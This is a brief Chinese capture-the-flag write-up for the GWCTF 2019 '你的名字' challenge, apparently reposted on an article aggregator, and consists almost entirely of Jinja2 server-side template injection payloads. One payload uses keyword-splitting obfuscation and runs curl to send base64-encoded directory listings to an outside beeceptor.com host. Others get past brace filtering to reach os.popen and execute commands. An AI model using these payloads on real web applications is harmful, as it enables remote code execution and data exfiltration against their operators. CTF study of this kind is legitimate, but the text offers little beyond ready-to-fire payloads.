[GWCTF 2019]你的名字

本文主要是介绍[GWCTF 2019]你的名字，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

知识点;ssti

参考：
Python模板注入(SSTI)深入学习
wp

外带{% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclaconfigsses__()[59].__init__.func_glconfigobals.lineconfigcache.oconfigs.popconfigen('curl https://sfg56dsf.free.beeceptor.com/?i=`ls / |base64`') %}1{% endiconfigf %}

{{和}}过滤绕过

{%print lipsum.__globals__.__builtins__.__import__('os').popen('whoami').read()%}

{%print lipsum.__globals__['__bui'+'ltins__']['__im'+'port__']('o'+'s')['po'+'pen']('whoami').read()%}

分别定义

{%set a='__bui'+'ltins__'%}
{%set b='__im'+'port__'%}
{%set c='o'+'s'%}
{%set d='po'+'pen'%}
{%print(lipsum['__globals__'][a][b](c)[d]('whoami')['read']())%}

python模板还不会啊，先拿payload打一下

这篇关于[GWCTF 2019]你的名字的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---